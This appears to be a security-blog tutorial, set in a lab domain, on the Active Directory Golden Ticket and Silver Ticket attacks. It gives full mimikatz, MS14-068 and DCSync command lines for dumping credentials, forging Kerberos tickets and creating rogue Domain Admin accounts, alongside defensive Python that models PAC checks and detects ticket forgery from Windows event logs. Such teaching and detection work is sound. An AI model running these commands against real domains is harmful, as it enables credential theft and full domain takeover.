Excalibra

Ticket Passing Attacks

This section introduces two common attack techniques used once an attacker has a foothold inside an Active Directory domain: the Golden Ticket and the Silver Ticket.

Readers already familiar with the Kerberos authentication process will find the principles behind these two attacks considerably easier to follow. Those who have not studied it are advised to review the Kerberos authentication process first.

Related Tools

Golden Ticket

Principle

During Kerberos authentication, after the Client authenticates to the Authentication Service (AS), the AS returns a Logon Session Key and a Ticket‑Granting Ticket (TGT). The TGT is encrypted with the long‑term key of the krbtgt account (for RC4 that key is simply the account's NTLM hash), and the Key Distribution Centre (KDC) keeps no record of the session key it handed out: everything it needs later is carried inside the TGT itself. Consequently, an attacker who obtains the krbtgt hash can forge a TGT together with a matching Logon Session Key entirely offline and go straight to the Ticket‑Granting Service (TGS) to request service tickets. Such a Golden Ticket bypasses AS validation entirely: no account name or password is ever checked, the PAC inside the ticket can claim any identity and group membership (mimikatz defaults to RID 500 and the Domain Admins, Enterprise Admins, Schema Admins and related groups), and changing the domain administrator's password afterwards makes no difference. The ticket only stops working once the krbtgt password has been reset twice, because the KDC still honours tickets issued under the previous krbtgt key; that double reset is also the standard remediation.

Characteristics

  • Does not require any interaction with the AS.
  • Requires the NTLM hash (or AES key) of the krbtgt account, plus the domain SID.

Detailed Procedure

1. Forging Credentials to Escalate Privileges of a Domain User

Assume that an attacker has logged on to a host within the domain as a local Administrator.

The command net config workstation reveals, among other details, that the domain is named cyberpeace.

The command nltest /dsgetdc:<domain> (here nltest /dsgetdc:cyberpeace) identifies the Domain Controller hostname as scene.

Mimikatz is uploaded and executed with administrator privileges:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

Examination of the generated log.txt reveals a domain user account, devuser, with the password HOTdev123456.

Logging in as devuser and running whoami confirms the current user context.

The presence of the MS14‑068 vulnerability (CVE‑2014‑6324, fixed by KB3011780) is checked with the command systeminfo | find "3011780". An empty result indicates the patch is absent. Two caveats: the flaw is in the KDC's validation of the PAC, so the patch state that actually matters is that of the domain controller, not of the workstation the check is run on; and the forged TGT carries a normal ticket lifetime (10 hours by default), so the escalation is time‑limited unless it is used to obtain something persistent, as the krbtgt extraction below does.

An attempt to access the administrative share on the domain controller with dir \\scene.cyberpeace.com\c$ fails owing to insufficient permissions.

The MS14‑068 exploit tool and mimikatz are uploaded. The user’s SID is obtained using either whoami /user or whoami /all.

The MS14‑068 tool is used to forge a ticket:

C:\MS14-068>MS14-068.exe -u devuser@cyberpeace.com -p HOTdev123456 -s S-1-5-21-97341123-1865264218-933115267-1108 -d scene.cyberpeace.com

A credential‑cache (.ccache) file containing the forged TGT is written to the current directory. The general usage is:

ms14-068.exe -u <domain_user>@<domain> -p <password> -s <user_SID> -d <domain_controller>

Within mimikatz, the existing Kerberos ticket cache is purged and the forged ticket is imported:

mimikatz # kerberos::purge
mimikatz # kerberos::ptc <path_to_ticket_file>

The command dir \\scene.cyberpeace.com\c$ now executes successfully, demonstrating that domain administrator privileges have been obtained.

A new domain administrator account, aaa, is created:

net user aaa Qwe123... /add /domain
net group "Domain Admins" aaa /add /domain

2. Forging a Golden Ticket

Prerequisites for forging a Golden Ticket

  1. Domain name
  2. Domain SID value
  3. NTLM hash of the krbtgt account
  4. Arbitrary username to be forged

Logging in as the domain administrator aaa and executing whoami confirms the identity.

The NTLM hash of krbtgt is extracted using the following mimikatz commands:

mimikatz(commandline) # privilege::debug
mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /all /csv
mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /user:krbtgt

The output shows the NTLM hash of krbtgt together with its object SID. The domain SID needed in the next step is that SID with its final component removed (the trailing 502 is the krbtgt RID, not part of the domain identifier).

Mimikatz is then employed to generate the Golden Ticket and save it as a .kirbi file:

mimikatz.exe "kerberos::golden /admin:system /domain:cyberpeace.com /sid:S-1-5-21-97341123-1865264218-933115267 /krbtgt:95972cdf7b8dde854e74c1871f6d80a0 /ticket:ticket.kirbi" exit
  • /admin : forged username
  • /domain : domain name
  • /sid : domain SID, i.e. any account's SID with the final RID component removed (S-1-5-21-97341123-1865264218-933115267-1108 becomes S-1-5-21-97341123-1865264218-933115267)
  • /krbtgt : NTLM hash of krbtgt; this produces an RC4‑encrypted ticket, which stands out in domains that otherwise use AES, so /aes128 or /aes256 with the corresponding krbtgt key is the quieter choice. /id (default 500) and /groups (default 513,512,520,518,519) control the identity the forged PAC claims
  • /ticket : name of the generated ticket file

3. Using the Golden Ticket (Creating a Domain Admin Account from a Standard Domain Account)

The attacker logs into the domain with an ordinary user account. Using mimikatz, the previously generated ticket.kirbi is loaded into memory:

mimikatz # kerberos::purge
mimikatz # kerberos::ptt ticket.kirbi

At this point, an attempt to create a domain administrator account named ccc succeeds.

Silver Ticket

Principle

If the Golden Ticket is a forged TGT, the Silver Ticket is a forged Service Ticket (ST). In the third stage of Kerberos authentication, the Client presents the ST together with Authenticator3 to a service hosted on a particular server. The server decrypts the ST with its own long‑term key (derived from the service account's password; for services such as CIFS or HOST that run as the machine itself, this is the computer account's hash) to obtain the Session Key, then decrypts Authenticator3 with that Session Key to verify the Client's identity. If verification succeeds, the Client is granted access to the designated service. Nothing in this step involves the KDC, and by default a service running as SYSTEM or holding SeTcbPrivilege does not ask the KDC to validate the PAC's signature either, so every check the server performs uses key material the forger already holds.

Thus, if an attacker knows the NTLM hash of the account under which the target service runs, a valid ST, including a PAC claiming any group membership, can be forged without any communication with the KDC. However, such a forged ticket works only against the specific service on the specific host whose key was used to encrypt it.

Characteristics

  1. Does not require interaction with the KDC.
  2. Requires the NTLM hash of the target service account (for CIFS or HOST on a given machine, that machine's computer account).
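The reason each of the three forgeries on this page works comes down to which PAC signature each party actually verifies. The model below is an added example, not code from the original post: it keeps only the two checksums a real PAC carries (a server checksum under the service key and a KDC checksum under the krbtgt key), substitutes HMAC‑SHA256 for the real checksum types and a JSON body for the real PAC layout, and uses the two hashes shown on this page purely as byte strings. With those assumptions it shows why a Silver Ticket passes when PAC validation is off and fails when it is on, why an unpatched MS14‑068 KDC accepted a PAC signed with no key at all, and why a Golden Ticket passes everything. The SID helper also performs the /sid derivation described in the Golden Ticket section.

```python
"""Toy model of the Kerberos PAC signature checks behind Golden Ticket,
Silver Ticket and MS14-068. Added example, not code from the original post.
A real PAC carries a server checksum (service key) and a KDC checksum (krbtgt
key); here both are HMAC-SHA256 and the PAC body is JSON, so this runs with
the standard library only.
"""
import hashlib
import hmac
import json

# The two lab hashes shown on this page, used here purely as key bytes.
KRBTGT_KEY = bytes.fromhex("95972cdf7b8dde854e74c1871f6d80a0")
SERVICE_KEY = bytes.fromhex("9a68826fdc2811f20d1f73a471ad7b9a")   # e.g. scene$ for CIFS

# mimikatz kerberos::golden defaults: /id:500 and /groups:513,512,520,518,519
MIMIKATZ_DEFAULT_RID = 500
MIMIKATZ_DEFAULT_GROUPS = (513, 512, 520, 518, 519)


def domain_sid_from_user_sid(user_sid: str) -> str:
    """S-1-5-21-...-1108 -> S-1-5-21-...: drop the RID, which is what /sid expects."""
    domain_sid, _rid = user_sid.rsplit("-", 1)
    return domain_sid


def build_pac(user: str, domain_sid: str, rid: int, groups) -> bytes:
    """Canonical encoding of the fields the checksums must cover."""
    body = {"user": user, "domain_sid": domain_sid, "rid": rid, "groups": sorted(groups)}
    return json.dumps(body, sort_keys=True).encode()


def keyed_checksum(key: bytes, pac: bytes) -> bytes:
    return hmac.new(key, pac, hashlib.sha256).digest()


def unkeyed_checksum(pac: bytes) -> bytes:
    """Stands in for the unkeyed MD5 checksum type an MS14-068 KDC accepted."""
    return hashlib.md5(pac).digest()


def sign_pac(pac: bytes, service_key: bytes, kdc_key: bytes) -> dict:
    return {"pac": pac,
            "server_sig": keyed_checksum(service_key, pac),
            "kdc_sig": keyed_checksum(kdc_key, pac)}


def kdc_accepts_pac(ticket: dict, kdc_key: bytes, patched: bool) -> bool:
    """KDC validating a PAC it is handed. Before KB3011780 it also accepted an
    unkeyed checksum in place of the keyed KDC signature (MS14-068)."""
    pac = ticket["pac"]
    if hmac.compare_digest(ticket["kdc_sig"], keyed_checksum(kdc_key, pac)):
        return True
    return (not patched) and hmac.compare_digest(ticket["kdc_sig"], unkeyed_checksum(pac))


def service_accepts_ticket(ticket: dict, service_key: bytes, kdc_key: bytes,
                           validate_pac: bool) -> bool:
    """A service checks the checksum under its own key. The KDC checksum is only
    checked when PAC validation is on (a round trip to the KDC, the one step a
    forger holding just the service key cannot satisfy)."""
    pac = ticket["pac"]
    if not hmac.compare_digest(ticket["server_sig"], keyed_checksum(service_key, pac)):
        return False
    if not validate_pac:
        return True
    return hmac.compare_digest(ticket["kdc_sig"], keyed_checksum(kdc_key, pac))


def demo() -> dict:
    """One forged PAC (RID 500 plus the default admin groups) under each attack's keys."""
    domain_sid = domain_sid_from_user_sid("S-1-5-21-97341123-1865264218-933115267-1108")
    pac = build_pac("system", domain_sid, MIMIKATZ_DEFAULT_RID, MIMIKATZ_DEFAULT_GROUPS)
    no_krbtgt_key = bytes(16)  # the Silver Ticket forger does not hold the real one

    silver = sign_pac(pac, SERVICE_KEY, no_krbtgt_key)
    ms14_068 = {"pac": pac, "server_sig": unkeyed_checksum(pac), "kdc_sig": unkeyed_checksum(pac)}
    golden = sign_pac(pac, KRBTGT_KEY, KRBTGT_KEY)   # a TGT's "service" is krbtgt itself

    return {
        "silver, pac validation off": service_accepts_ticket(silver, SERVICE_KEY, KRBTGT_KEY, False),
        "silver, pac validation on": service_accepts_ticket(silver, SERVICE_KEY, KRBTGT_KEY, True),
        "ms14-068, unpatched kdc": kdc_accepts_pac(ms14_068, KRBTGT_KEY, patched=False),
        "ms14-068, patched kdc": kdc_accepts_pac(ms14_068, KRBTGT_KEY, patched=True),
        "golden, patched kdc": kdc_accepts_pac(golden, KRBTGT_KEY, patched=True),
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case:28s} -> {'accepted' if accepted else 'rejected'}")
```

The model is deliberately minimal: it omits ticket encryption, the authenticator and timestamps, and only tracks who verifies which signature. That is enough to read off the defensive levers: PAC validation turns the Silver Ticket into a detectable KDC round trip, KB3011780 closes the unkeyed‑checksum path, and nothing short of a double krbtgt reset stops a Golden Ticket.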

Detailed Procedure

1. Forging Credentials to Escalate Privileges of a Domain User

Again, the attack begins from a local Administrator account on a domain‑joined host.

The command net config workstation reveals the domain name as cyberpeace.

The domain controller hostname scene is obtained with nltest /dsgetdc:<domain>.

Mimikatz is executed with administrator rights:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

The log file shows a domain user account, Hellen, with the password Hellen1818.

After logging in as Hellen, whoami confirms the user context.

The presence of the MS14‑068 vulnerability is verified.

Access to the administrative share is initially denied.

The exploit tool and mimikatz are uploaded, and the user’s SID is retrieved.

A ticket is forged with MS14‑068:

MS14-068.exe -u Hellen@cyberpeace.com -p Hellen1818 -s S-1-5-21-2718660907-658632824-2072795563-1110 -d DomainControl.cyberpeace.com

The generic syntax is:

ms14-068.exe -u <domain_user>@<domain> -p <password> -s <user_SID> -d <domain_controller>

Inside mimikatz, the old tickets are purged and the forged ticket is imported:

mimikatz # kerberos::purge
mimikatz # kerberos::ptc <path_to_ticket_file>

The command dir \\scene.cyberpeace.com\c$ now succeeds, indicating domain administrator privileges.

A domain administrator account ccc is created:

net user ccc Qwe1234 /add /domain
net group "Domain Admins" ccc /add /domain

2. Forging a Silver Ticket

Logging in as the newly created domain administrator on the domain controller, mimikatz is run with administrator privileges to extract the material needed for the forgery. For a CIFS ticket against scene that is the NTLM hash of the domain controller's computer account (scene$), since the CIFS service on that host runs under the machine account; the domain SID is read from any of the SIDs in the same output:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

The hash and mimikatz are then taken to a domain‑joined machine on which the attacker holds only a local account. After purging the existing ticket cache, the silver ticket is forged and injected straight into the current session (/ptt) with the following command:

kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.cyberpeace.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt

The general usage pattern is:

kerberos::golden /domain:<domain> /sid:<domain_SID> /target:<target_server> /service:<service_type> /rc4:<NTLM_hash> /user:<username> /ptt

The <username> may be chosen arbitrarily: the service never checks it against the directory, and it need not exist at all.

Since the attacker holds no TGT with which to request further tickets, each silver ticket is bound to one service class on one host, selected with /service. The classes most often targeted are cifs (file shares, including the C$ administrative share used here), host (scheduled tasks, service control and PsExec‑style execution), rpcss together with host (WMI), http and wsman (PowerShell Remoting), ldap (on a domain controller, enough for DCSync) and mssqlsvc (SQL Server).

The command dir \\scene.cyberpeace.com\c$ executes successfully. Because the target here is the domain controller itself and the forged PAC claims Domain Admins membership, the SAMR calls behind net user ... /domain, which travel over an SMB named pipe to that same host, are covered by the CIFS ticket as well, so a domain administrator account can be created.

Differences between Golden and Silver Tickets

Scope of Access

  • Golden Ticket: Forges a TGT, thereby granting access to any Kerberos‑protected service.
  • Silver Ticket: Forges an ST, granting access only to the specific service for which it was crafted (e.g., CIFS).

Authentication Flow

  • Golden Ticket: Skips the AS exchange, but still presents the forged TGT to the TGS (KDC) to obtain service tickets.
  • Silver Ticket: Does not interact with the KDC at all; it communicates directly with the target server.

Encryption Mechanism

  • Golden Ticket: Encrypted and signed with the krbtgt key (the NTLM hash for RC4, or the AES key), which only a double krbtgt password reset invalidates.
  • Silver Ticket: Encrypted and signed with the key of the account hosting the target service (the computer account for CIFS or HOST); resetting that account's password invalidates it.
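The two gaps in the authentication flow listed above are also the cleanest detection signal a defender has: a Golden Ticket produces service‑ticket requests (event 4769) for a user who never requested a TGT (event 4768), and a Silver Ticket produces a Kerberos logon (event 4624) on the target for a user the KDC never issued a service ticket to. The script below is an added example, not code from the original post; the event records are constructed, with the fields of those three Windows Security events reduced to the handful used here, and the field names and host values are assumptions for the sake of the demonstration. In practice the 4768/4769 records come from the domain controllers and the 4624 records from the target servers, so both sources have to be joined first.

```python
"""Correlate Kerberos audit events for the two flow gaps a Golden Ticket and a
Silver Ticket leave behind. Added example, not from the original post; the
events are constructed and the field names are simplified assumptions.
"""
from datetime import datetime, timedelta

TICKET_LIFETIME = timedelta(hours=10)   # default maximum TGT / service-ticket lifetime
RC4_HMAC = 0x17                         # etype mimikatz produces from an NTLM hash
AES256 = 0x12

EVENTS = [  # constructed sample, loosely following the lab on this page
    # legitimate devuser: AS exchange, TGS exchange, then SMB logon on scene
    {"ts": "2024-05-01T08:00:00", "host": "scene", "id": 4768, "user": "devuser", "etype": AES256},
    {"ts": "2024-05-01T08:00:02", "host": "scene", "id": 4769, "user": "devuser", "service": "scene$", "etype": AES256},
    {"ts": "2024-05-01T08:00:03", "host": "scene", "id": 4624, "user": "devuser", "logon_type": 3, "auth": "Kerberos"},
    # Golden Ticket: service-ticket request with no TGT request for that user, RC4-encrypted
    {"ts": "2024-05-01T09:15:00", "host": "scene", "id": 4769, "user": "system", "service": "scene$", "etype": RC4_HMAC},
    {"ts": "2024-05-01T09:15:01", "host": "scene", "id": 4624, "user": "system", "logon_type": 3, "auth": "Kerberos"},
    # Silver Ticket: Kerberos network logon on the target with no service-ticket request at the KDC
    {"ts": "2024-05-01T10:30:00", "host": "scene", "id": 4624, "user": "test", "logon_type": 3, "auth": "Kerberos"},
]


def _when(event: dict) -> datetime:
    return datetime.fromisoformat(event["ts"])


def _preceded_by(events, event_id: int, user: str, at: datetime, window: timedelta) -> bool:
    """True if `user` has an event `event_id` no more than `window` before `at`."""
    return any(e["id"] == event_id and e["user"] == user
               and timedelta(0) <= at - _when(e) <= window
               for e in events)


def golden_ticket_suspects(events) -> list:
    """4769 at the KDC with no 4768 for the same user inside a TGT lifetime:
    the AS exchange a Golden Ticket skips. Returns (user, ts, used_rc4)."""
    return [(e["user"], e["ts"], e["etype"] == RC4_HMAC)
            for e in events
            if e["id"] == 4769
            and not _preceded_by(events, 4768, e["user"], _when(e), TICKET_LIFETIME)]


def silver_ticket_suspects(events) -> list:
    """Kerberos network logon (type 3) on a server with no 4769 for that user
    inside a service-ticket lifetime: the KDC exchange a Silver Ticket skips."""
    return [(e["user"], e["host"], e["ts"])
            for e in events
            if e["id"] == 4624 and e.get("auth") == "Kerberos" and e.get("logon_type") == 3
            and not _preceded_by(events, 4769, e["user"], _when(e), TICKET_LIFETIME)]


if __name__ == "__main__":
    for user, ts, rc4 in golden_ticket_suspects(EVENTS):
        print(f"golden? {user} at {ts}: TGS request without TGT request{', RC4 etype' if rc4 else ''}")
    for user, host, ts in silver_ticket_suspects(EVENTS):
        print(f"silver? {user} on {host} at {ts}: Kerberos logon without TGS request")
```

The window is the ticket lifetime rather than a few minutes because a client with a cached ticket legitimately reuses it without a fresh request; shortening the window trades missed reuse for false positives. The RC4 flag is a secondary indicator: mimikatz emits etype 0x17 whenever it is given only an NTLM hash, so an RC4 request for an account whose other requests use AES deserves a look even when the correlation alone is inconclusive.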
